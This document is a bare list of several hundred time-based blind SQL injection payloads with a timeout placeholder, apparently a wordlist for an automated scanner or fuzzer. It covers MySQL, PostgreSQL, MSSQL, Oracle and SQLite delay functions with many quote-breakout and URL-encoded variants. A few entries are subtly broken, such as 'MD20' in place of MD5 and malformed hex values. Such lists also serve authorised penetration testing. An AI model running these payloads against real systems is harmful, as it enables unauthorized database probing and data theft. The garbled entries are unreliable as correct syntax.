0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'X
0"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR"Z
'XOR(if((select now()=sysdate()),sleep(%__TIME_OUT__%),0))XOR'Z
X'XOR(if(now()=sysdate(),//sleep(%__TIME_OUT__%)//,0))XOR'X
X'XOR(if(now()=sysdate(),(sleep((((%__TIME_OUT__%))))),0))XOR'X
X'XOR(if((select now()=sysdate()),BENCHMARK(%__TIME_OUT__%,md5('xyz')),0))XOR'X
'XOR(SELECT(0)FROM(SELECT(SLEEP(%__TIME_OUT__%)))a)XOR'Z
(SELECT(0)FROM(SELECT(SLEEP(%__TIME_OUT__%)))a)
'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))OR'
(SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))a)
'%2b(select*from(select(sleep(%__TIME_OUT__%)))a)%2b'
CASE//WHEN(LENGTH(version())=%__TIME_OUT__%)THEN(SLEEP(6*1))END
');(SELECT 4564 FROM PG_SLEEP(%__TIME_OUT__%))--
["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE(%__TIME_OUT__%)%23"]
DBMS_PIPE.RECEIVE_MESSAGE(%5BINT%5D,%__TIME_OUT__%)%20AND%20%27bar%27=%27bar
AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],%__TIME_OUT__%) AND 'bar'='bar
1' AND (SELECT 6268 FROM (SELECT(SLEEP(%__TIME_OUT__%)))ghXo) AND 'IKlK'='IKlK
(select*from(select(sleep(%__TIME_OUT__%)))a)
*'XOR(if(2=2,sleep(%__TIME_OUT__%),0))OR'
-1' or 1=IF(LENGTH(ASCII((SELECT USER())))&gt;%__TIME_OUT__%, 1, 0)--//
'+(select*from(select(if(1=1,sleep(%__TIME_OUT__%),false)))a)+'"
2021 AND (SELECT 6868 FROM (SELECT(SLEEP(32)))IiOE)
BENCHMARK(%__TIME_OUT__%,MD5(CHAR(116)))
'%2bbenchmark(%__TIME_OUT__%%2csha1(%__TIME_OUT__%))%2b'
'%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(%__TIME_OUT__%),1)))a)--%20 - true
if(now()=sysdate(),sleep(%__TIME_OUT__%),0)/'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))OR'"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))OR"/
if(now()=sysdate(),sleep(%__TIME_OUT__%),0)/'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))OR'"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0) and 1=1)"/
1 and sleep %__TIME_OUT__%--
1 and sleep %__TIME_OUT__%
1 and sleep(%__TIME_OUT__%)--
1 and sleep(%__TIME_OUT__%)
' and sleep %__TIME_OUT__%--
' and sleep %__TIME_OUT__%
' and sleep %__TIME_OUT__% and '1'='1
' and sleep(%__TIME_OUT__%) and '1'='1
' and sleep(%__TIME_OUT__%)--
' and sleep(%__TIME_OUT__%)
' AnD SLEEP(%__TIME_OUT__%) ANd '1
and sleep %__TIME_OUT__%--
and sleep %__TIME_OUT__%
and sleep(%__TIME_OUT__%)--
and sleep(%__TIME_OUT__%)
and SELECT SLEEP(%__TIME_OUT__%); #
AnD SLEEP(%__TIME_OUT__%)
AnD SLEEP(%__TIME_OUT__%)--
AnD SLEEP(%__TIME_OUT__%)#
' AND SLEEP(%__TIME_OUT__%)#
" AND SLEEP(%__TIME_OUT__%)#
') AND SLEEP(%__TIME_OUT__%)#
sleep(%__TIME_OUT__%)#
1 or sleep(%__TIME_OUT__%)#
" or sleep(%__TIME_OUT__%)#
' or sleep(%__TIME_OUT__%)#
" or sleep(%__TIME_OUT__%)="
' or sleep(%__TIME_OUT__%)='
1) or sleep(%__TIME_OUT__%)#
") or sleep(%__TIME_OUT__%)="
') or sleep(%__TIME_OUT__%)='
1)) or sleep(%__TIME_OUT__%)#
")) or sleep(%__TIME_OUT__%)="
')) or sleep(%__TIME_OUT__%)='
or sleep %__TIME_OUT__%--
or sleep %__TIME_OUT__%
or sleep(%__TIME_OUT__%)--
or sleep(%__TIME_OUT__%)
or SELECT SLEEP(%__TIME_OUT__%); #
or SLEEP(%__TIME_OUT__%)
or SLEEP(%__TIME_OUT__%)#
or SLEEP(%__TIME_OUT__%)--
or SLEEP(%__TIME_OUT__%)="
or SLEEP(%__TIME_OUT__%)='
' OR SLEEP(%__TIME_OUT__%)#
" OR SLEEP(%__TIME_OUT__%)#
') OR SLEEP(%__TIME_OUT__%)#
)) or sleep(%__TIME_OUT__%)='
or sleep(%__TIME_OUT__%)#
%20'sleep%%__TIME_OUT__%200'
%20$(sleep%%__TIME_OUT__%200)
or sleep(%__TIME_OUT__%)='
) or sleep(%__TIME_OUT__%)='
";SELECT pg_sleep(%__TIME_OUT__%);
;SELECT pg_sleep(%__TIME_OUT__%);
and SELECT pg_sleep(%__TIME_OUT__%);
1 SELECT pg_sleep(%__TIME_OUT__%);
or SELECT pg_sleep(%__TIME_OUT__%);
(SELECT pg_sleep(%__TIME_OUT__%))
pg_sleep(%__TIME_OUT__%)--
1 or pg_sleep(%__TIME_OUT__%)--
" or pg_sleep(%__TIME_OUT__%)--
' or pg_sleep(%__TIME_OUT__%)--
1) or pg_sleep(%__TIME_OUT__%)--
") or pg_sleep(%__TIME_OUT__%)--
') or pg_sleep(%__TIME_OUT__%)--
1)) or pg_sleep(%__TIME_OUT__%)--
")) or pg_sleep(%__TIME_OUT__%)--
')) or pg_sleep(%__TIME_OUT__%)--
pg_SLEEP(%__TIME_OUT__%)
pg_SLEEP(%__TIME_OUT__%)--
pg_SLEEP(%__TIME_OUT__%)#
or pg_SLEEP(%__TIME_OUT__%)
or pg_SLEEP(%__TIME_OUT__%)--
or pg_SLEEP(%__TIME_OUT__%)#
' SELECT pg_sleep(%__TIME_OUT__%);
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(%__TIME_OUT__%))
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(%__TIME_OUT__%))-- 1337
1' AND 1337=(SELECT 1337 FROM PG_SLEEP(%__TIME_OUT__%)) AND '1337'='1337
1') AND 1337=(SELECT 1337 FROM PG_SLEEP(%__TIME_OUT__%)) AND ('1337'='1337
1) AND 1337=(SELECT 1337 FROM PG_SLEEP(%__TIME_OUT__%)) AND (1337=1337
or pg_sleep(%__TIME_OUT__%)--
) or pg_sleep(%__TIME_OUT__%)--
)) or pg_sleep(%__TIME_OUT__%)--
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20)
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20)-- 1337
' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20) AND '1337'='1337
') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20) AND ('1337'='1337
) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20) AND (1337=1337
;waitfor delay '%__TIME_OUT__%'--
';WAITFOR DELAY '%__TIME_OUT__%'--
);waitfor delay '%__TIME_OUT__%'--
';waitfor delay '%__TIME_OUT__%'--
";waitfor delay '%__TIME_OUT__%'--
');waitfor delay '%__TIME_OUT__%'--
");waitfor delay '%__TIME_OUT__%'--
));waitfor delay '%__TIME_OUT__%'--
'));waitfor delay '%__TIME_OUT__%'--
"));waitfor delay '%__TIME_OUT__%'--
") IF (1=1) WAITFOR DELAY '%__TIME_OUT__%'--
';%20waitfor%20delay%20'%__TIME_OUT__%'%20--%20
' WAITFOR DELAY '%__TIME_OUT__%'--
' WAITFOR DELAY '%__TIME_OUT__%'
or WAITFOR DELAY '%__TIME_OUT__%'--
or WAITFOR DELAY '%__TIME_OUT__%'
and WAITFOR DELAY '%__TIME_OUT__%'--
and WAITFOR DELAY '%__TIME_OUT__%'
WAITFOR DELAY '%__TIME_OUT__%'
;WAITFOR DELAY '%__TIME_OUT__%'--
;WAITFOR DELAY '%__TIME_OUT__%'
1 WAITFOR DELAY '%__TIME_OUT__%'--
1 WAITFOR DELAY '%__TIME_OUT__%'
1 WAITFOR DELAY '%__TIME_OUT__%'-- 1337
1' WAITFOR DELAY '%__TIME_OUT__%' AND '1337'='1337
1') WAITFOR DELAY '%__TIME_OUT__%' AND ('1337'='1337
1) WAITFOR DELAY '%__TIME_OUT__%' AND (1337=1337
') WAITFOR DELAY '%__TIME_OUT__%'--
" WAITFOR DELAY '%__TIME_OUT__%'--
')) WAITFOR DELAY '%__TIME_OUT__%'--
'))) WAITFOR DELAY '%__TIME_OUT__%'--
%' WAITFOR DELAY '%__TIME_OUT__%'--
") WAITFOR DELAY '%__TIME_OUT__%'--
")) WAITFOR DELAY '%__TIME_OUT__%'--
"))) WAITFOR DELAY '%__TIME_OUT__%'--
1 waitfor delay '%__TIME_OUT__%'--
1' waitfor delay '%__TIME_OUT__%'--
benchmark(%__TIME_OUT__%,MD20(%__TIME_OUT__%))#
1 or benchmark(%__TIME_OUT__%,MD20(%__TIME_OUT__%))#
" or benchmark(%__TIME_OUT__%,MD20(%__TIME_OUT__%))#
' or benchmark(%__TIME_OUT__%,MD20(%__TIME_OUT__%))#
1) or benchmark(%__TIME_OUT__%,MD20(%__TIME_OUT__%))#
") or benchmark(%__TIME_OUT__%,MD20(%__TIME_OUT__%))#
') or benchmark(%__TIME_OUT__%,MD20(%__TIME_OUT__%))#
1)) or benchmark(%__TIME_OUT__%,MD20(%__TIME_OUT__%))#
")) or benchmark(%__TIME_OUT__%,MD20(%__TIME_OUT__%))#
')) or benchmark(%__TIME_OUT__%,MD20(%__TIME_OUT__%))#
AND (SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))nQIP)#
SLEEP(%__TIME_OUT__%)#
SLEEP(%__TIME_OUT__%)--
SLEEP(%__TIME_OUT__%)="
SLEEP(%__TIME_OUT__%)='
waitfor delay '%__TIME_OUT__%'
waitfor delay '%__TIME_OUT__%'--
waitfor delay '%__TIME_OUT__%'#
benchmark((%__TIME_OUT__%)0,MD20(%__TIME_OUT__%))
benchmark((%__TIME_OUT__%)0,MD20(%__TIME_OUT__%))--
benchmark((%__TIME_OUT__%)0,MD20(%__TIME_OUT__%))#
or benchmark((%__TIME_OUT__%)0,MD20(%__TIME_OUT__%))
or benchmark((%__TIME_OUT__%)0,MD20(%__TIME_OUT__%))--
or benchmark((%__TIME_OUT__%)0,MD20(%__TIME_OUT__%))#
'\"
&&SLEEP(%__TIME_OUT__%)
&&SLEEP(%__TIME_OUT__%)--
&&SLEEP(%__TIME_OUT__%)#
'&&SLEEP(%__TIME_OUT__%)&&'1
ORDER BY SLEEP(%__TIME_OUT__%)
ORDER BY SLEEP(%__TIME_OUT__%)--
ORDER BY SLEEP(%__TIME_OUT__%)#
(SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))ecMj)
(SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))ecMj)--
+benchmark(3200,SHA1(%__TIME_OUT__%))+'
+ SLEEP(%__TIME_OUT__%) + '
RANDOMBLOB((%__TIME_OUT__%)/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB((%__TIME_OUT__%)/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB((%__TIME_OUT__%)/2))))
RANDOMBLOB(%__TIME_OUT__%/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(%__TIME_OUT__%/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(%__TIME_OUT__%/2))))
1 AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY)
1 AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND (1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND '1337'='1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND ('PBiy'='PBiy
) AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY)-- 1337
) AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND (1337=1337
)) AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND ((1337=1337
))) AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND (((1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY)# 1337
) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY)-- 1337
1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY)-- 1337
+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY))+
)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY)-- 1337
) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY)-- 1337
` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY)-- 1337
`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY)-- 1337
`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY))|[1
') AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY)-- 1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY)-- 1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND (('1337'='1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND ((('1337'='1337
' AND (SELECT 3122 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND '1337'='1337
') AND (SELECT 4796 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND (('1337' LIKE '1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND ((('1337' LIKE '1337
%' AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND '1337%'='1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND '1337' LIKE '1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND ("1337"="1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND (("1337"="1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND ((("1337"="1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND "1337"="1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND ("1337" LIKE "1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND (("1337" LIKE "1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND ((("1337" LIKE "1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) AND "1337" LIKE "1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY) OR '1337'='1337
') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY)-- 1337
") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY)-- 1337
RLIKE SLEEP(%__TIME_OUT__%)--
' RLIKE SLEEP(%__TIME_OUT__%)--
' RLIKE SLEEP(%__TIME_OUT__%)-- 1337
" RLIKE SLEEP(%__TIME_OUT__%)-- 1337
') RLIKE SLEEP(%__TIME_OUT__%)-- 1337
') RLIKE SLEEP(%__TIME_OUT__%) AND ('1337'='1337
')) RLIKE SLEEP(%__TIME_OUT__%) AND (('1337'='1337
'))) RLIKE SLEEP(%__TIME_OUT__%) AND ((('1337'='1337
) RLIKE SLEEP(%__TIME_OUT__%)-- 1337
) RLIKE SLEEP(%__TIME_OUT__%) AND (1337=1337
)) RLIKE SLEEP(%__TIME_OUT__%) AND ((1337=1337
))) RLIKE SLEEP(%__TIME_OUT__%) AND (((1337=1337
1 RLIKE SLEEP(%__TIME_OUT__%)
1 RLIKE SLEEP(%__TIME_OUT__%)-- 1337
1 RLIKE SLEEP(%__TIME_OUT__%)# 1337
) WHERE 1337=1337 RLIKE SLEEP(%__TIME_OUT__%)-- 1337
1 WHERE 1337=1337 RLIKE SLEEP(%__TIME_OUT__%)-- 1337
+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(%__TIME_OUT__%))+
)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(%__TIME_OUT__%)-- 1337
) AS 1337 WHERE 1337=1337 RLIKE SLEEP(%__TIME_OUT__%)-- 1337
` WHERE 1337=1337 RLIKE SLEEP(%__TIME_OUT__%)-- 1337
`) WHERE 1337=1337 RLIKE SLEEP(%__TIME_OUT__%)-- 1337
' RLIKE SLEEP(%__TIME_OUT__%) AND '1337'='1337
') RLIKE SLEEP(%__TIME_OUT__%) AND ('1337' LIKE '1337
')) RLIKE SLEEP(%__TIME_OUT__%) AND (('1337' LIKE '1337
'))) RLIKE SLEEP(%__TIME_OUT__%) AND ((('1337' LIKE '1337
%' RLIKE SLEEP(%__TIME_OUT__%) AND '1337%'='1337
' RLIKE SLEEP(%__TIME_OUT__%) AND '1337' LIKE '1337
") RLIKE SLEEP(%__TIME_OUT__%) AND ("1337"="1337
")) RLIKE SLEEP(%__TIME_OUT__%) AND (("1337"="1337
"))) RLIKE SLEEP(%__TIME_OUT__%) AND ((("1337"="1337
" RLIKE SLEEP(%__TIME_OUT__%) AND "1337"="1337
") RLIKE SLEEP(%__TIME_OUT__%) AND ("1337" LIKE "1337
")) RLIKE SLEEP(%__TIME_OUT__%) AND (("1337" LIKE "1337
"))) RLIKE SLEEP(%__TIME_OUT__%) AND ((("1337" LIKE "1337
" RLIKE SLEEP(%__TIME_OUT__%) AND "1337" LIKE "1337
' RLIKE SLEEP(%__TIME_OUT__%) OR '1337'='1337
') WHERE 1337=1337 RLIKE SLEEP(%__TIME_OUT__%)-- 1337
") WHERE 1337=1337 RLIKE SLEEP(%__TIME_OUT__%)-- 1337
' WHERE 1337=1337 RLIKE SLEEP(%__TIME_OUT__%)-- 1337
" WHERE 1337=1337 RLIKE SLEEP(%__TIME_OUT__%)-- 1337
' AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))--
' AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))-- 1337
" AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))-- 1337
') AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))-- 1337
') AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND ('1337'='1337
')) AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND (('1337'='1337
'))) AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND ((('1337'='1337
' AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND '1337'='1337
') AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND ('1337' LIKE '1337
')) AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND (('1337' LIKE '1337
'))) AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND ((('1337' LIKE '1337
) AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))-- 1337
) AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND (1337=1337
)) AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND ((1337=1337
))) AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND (((1337=1337
1 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))
1 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))-- 1337
1 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))# 1337
) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))-- 1337
1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))-- 1337
+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)))+
)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))-- 1337
) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))-- 1337
` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))-- 1337
`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))-- 1337
1`=`1` AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)))|[1
%' AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND '1337%'='1337
' AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND '1337' LIKE '1337
") AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND ("1337"="1337
")) AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND (("1337"="1337
"))) AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND ((("1337"="1337
" AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND "1337"="1337
") AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND ("1337" LIKE "1337
")) AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND (("1337" LIKE "1337
"))) AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND ((("1337" LIKE "1337
" AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) AND "1337" LIKE "1337
' AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)) OR '1337'='FMTE
') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))-- 1337
") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))-- 1337
' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))-- 1337
" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))-- 1337
'||(SELECT 0x4c4204f67 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)))||'
'||(SELECT 0x727a20277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)))||'
'+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)))+'
||(SELECT 0x20720206971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)))||
||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)))||
+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%)))+
')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))-- 1337
")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))-- 1337
') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))-- 1337
") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(%__TIME_OUT__%))-- 1337
SLEEP(%__TIME_OUT__%)/*' or SLEEP(%__TIME_OUT__%) or '" or SLEEP(%__TIME_OUT__%) or "*/
0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z
'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z
'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%*%__TIME_OUT__%),0))XOR'Z
'XOR(SELECT(0)FROM(SELECT(SLEEP(%__TIME_OUT__%)))a)XOR'Z
if(now()=sysdate(),sleep(%__TIME_OUT__%),0)
'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'
'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))OR'
'|(IF((now())LIKE(sysdate()),SLEEP(%__TIME_OUT__%),0))|'Z
'or(now()=sysdate()&&SLEEP(%__TIME_OUT__%))or'Z
if(now()=sysdate(),sleep(%__TIME_OUT__%),0)/"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))OR"/
if(now()=sysdate(),sleep(%__TIME_OUT__%),0)/*'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))OR'"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))OR"*/
if(now()=sysdate(),sleep(%__TIME_OUT__%),0)/'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))OR'"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0) and 20=20)"/
if(1=1,sleep(%__TIME_OUT__%),0)/*'XOR(if(1=1,sleep(%__TIME_OUT__%),0))OR'"XOR(if(1=1,sleep(%__TIME_OUT__%),0))OR"*/
if(1337=1337,exp(~(%__TIME_OUT__%)),0)/*'XOR(if(1337=1337,exp(~(%__TIME_OUT__%)),0))OR'"XOR(if(1337=1337,sleep(%__TIME_OUT__%),0))OR"*/
%2c(select%20*%20from%20(select(sleep(%__TIME_OUT__%)))a)
(select(0)from(select(sleep(%__TIME_OUT__%)))v)
(SELECT SLEEP(%__TIME_OUT__%))
1'%2b(select*from(select(sleep(%__TIME_OUT__%)))a)%2b'
,(select * from (select(sleep(%__TIME_OUT__%)))a)
desc%2c(select*from(select(sleep(%__TIME_OUT__%)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(%__TIME_OUT__%))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(%__TIME_OUT__%))A))
(SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY)
(SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY)#
(SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))YYYY)--
'+(select*from(select(sleep(%__TIME_OUT__%)))a)+'
(select(0)from(select(sleep(%__TIME_OUT__%)))v)%2f'+
(select(0)from(select(sleep(%__TIME_OUT__%)))v)+'"
(select(0)from(select(sleep(%__TIME_OUT__%)))v)%2f*'+
(select(0)from(select(sleep(%__TIME_OUT__%)))v)+'"+
(select(0)from(select(sleep(%__TIME_OUT__%)))v)+"*%2f
(select(0)from(select(sleep(%__TIME_OUT__%)))v)/*'+
(select(0)from(select(sleep(%__TIME_OUT__%)))v)+"*/
(select(0)from(select(sleep(%__TIME_OUT__%)))v)+'\"+
(select(0)from(select(sleep(%__TIME_OUT__%)))v)+\"*/
',''),/*test*/%26%26%09sLeEp(%__TIME_OUT__%)%09--+
' and (select*from(select(sleep(%__TIME_OUT__%)))a)--%20
'+||+(%__TIME_OUT__%)=(%__TIME_OUT__%)+LiMiT+1--+-
'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'X
"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR"Z
-10'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z
X'XOR(if((select now()=sysdate()),BENCHMARK(%__TIME_OUT__%,md20('xyz')),0))XOR'X
'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%*%__TIME_OUT__%),0))OR'
'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%*%__TIME_OUT__%*%__TIME_OUT__%),0))OR'
CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END
');(SELECT 42064 FROM PG_SLEEP(%__TIME_OUT__%))--
["')//OR//MID(0x3202e362e33332d6c6f67,1,1)//LIKE//20//%23"]
DBMS_PIPE.RECEIVE_MESSAGE(%20BINT%20D,%__TIME_OUT__%)%20AND%20%27bar%27=%27bar
AND 208201=DBMS_PIPE.RECEIVE_MESSAGE([INT],%__TIME_OUT__%) AND 'bar'='bar
1' AND (SELECT 6268 FROM (SELECT(SLEEP(%__TIME_OUT__%)))ghXo) AND 'IKlK'='IKlK
'%2b(select*from(select(sleep(0)))a)%2b'
